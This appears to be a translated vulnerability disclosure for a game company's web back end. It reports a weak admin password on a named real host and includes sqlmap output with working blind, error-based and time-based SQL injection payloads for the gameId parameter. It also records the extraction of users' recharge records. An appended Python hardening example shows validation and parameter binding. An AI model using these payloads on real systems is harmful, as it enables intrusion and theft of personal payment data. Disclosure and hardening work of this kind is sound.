Hero Mutual Entertainment: weak password and SQL injection in a website back end (the amount of user data involved for a gun-battle game is unknown)
Treat it as a small vendor: the earlier getshell only earned rank 2 (the administrators are also expected to mask some of the information ~)
Password guessing against http://idk.yingxiong.com/ found a weak password.
[Masked region]
The password is 123456.
Then we found some statistics pages in the back end ~ and checked whether any of them is injectable.
http://idk.yingxiong.com:80/players/retained?gameId=131&type=0&begintime=2015%2F10%2F13&endtime=2016%2F01%2F11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 (GET)
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Parameter: gameId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
---
back-end DBMS: MySQL 5.0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: gameId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1
---
back-end DBMS: MySQL 5.0
available databases [10]:
[Masked region]
The qiangzhan database contains many non-table names.
[Masked region]
A random part of the data was extracted through the injection.
Let's take a look at user_pay: 100 entries of users' recharge records were selected at random.
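
How the /players/retained handler could be hardened against the gameId injection above, as an added example that is not part of the original report or the vendor's code. It validates every parameter from the reported URL by type, binds values as query parameters, and takes sort/field only from allow-lists because ORDER BY identifiers cannot be bound. The retention table, its columns, the function names and the sample rows are constructed assumptions, and sqlite3 stands in for MySQL.

```python
import sqlite3
from datetime import datetime

# Assumed allow-lists: only sort=desc and field=datetime appear in the report's URL.
SORT_FIELDS = {"datetime"}
SORT_DIRS = {"asc", "desc"}
INT_PARAMS = ("gameId", "type", "channelID", "gameRegionID", "page")

def validate(params):
    """Return typed parameters or raise ValueError; no raw text is passed through."""
    clean = {}
    for name in INT_PARAMS:
        value = params.get(name, "")
        if not (value.isascii() and value.isdigit()):
            raise ValueError(f"{name} must be an unsigned integer")
        clean[name] = int(value)
    for name in ("begintime", "endtime"):
        # strptime raises ValueError on any trailing text after the date.
        clean[name] = datetime.strptime(params.get(name, ""), "%Y/%m/%d").date().isoformat()
    if params.get("field") not in SORT_FIELDS or params.get("sort") not in SORT_DIRS:
        raise ValueError("sort/field not in allow-list")
    return dict(clean, field=params["field"], sort=params["sort"])

def retained(conn, params):
    p = validate(params)
    # Values are bound with ?; the ORDER BY parts come only from the allow-lists.
    sql = ("SELECT datetime, retained FROM retention "
           "WHERE game_id = ? AND datetime BETWEEN ? AND ? "
           f'ORDER BY "{p["field"]}" {p["sort"]}')
    return conn.execute(sql, (p["gameId"], p["begintime"], p["endtime"])).fetchall()

def demo():
    # Constructed schema and rows (hypothetical, not from the report).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE retention (game_id INTEGER, datetime TEXT, retained INTEGER)")
    conn.executemany("INSERT INTO retention VALUES (?, ?, ?)",
                     [(131, "2015-10-13", 40), (131, "2016-01-11", 25), (7, "2015-12-01", 9)])
    good = {"gameId": "131", "type": "0", "begintime": "2015/10/13", "endtime": "2016/01/11",
            "channelID": "0", "gameRegionID": "0", "sort": "desc", "field": "datetime", "page": "1"}
    rows = retained(conn, good)
    try:  # the boolean-based payload sqlmap reported for gameId
        retained(conn, dict(good, gameId="131 AND 1182=1182-- wnlV"))
        rejected = False
    except ValueError:
        rejected = True
    return rows, rejected

if __name__ == "__main__":
    print(demo())
```

Rejected requests are also a useful detection signal: a non-numeric gameId on this endpoint should be logged and alerted on, since the legitimate front end never sends one.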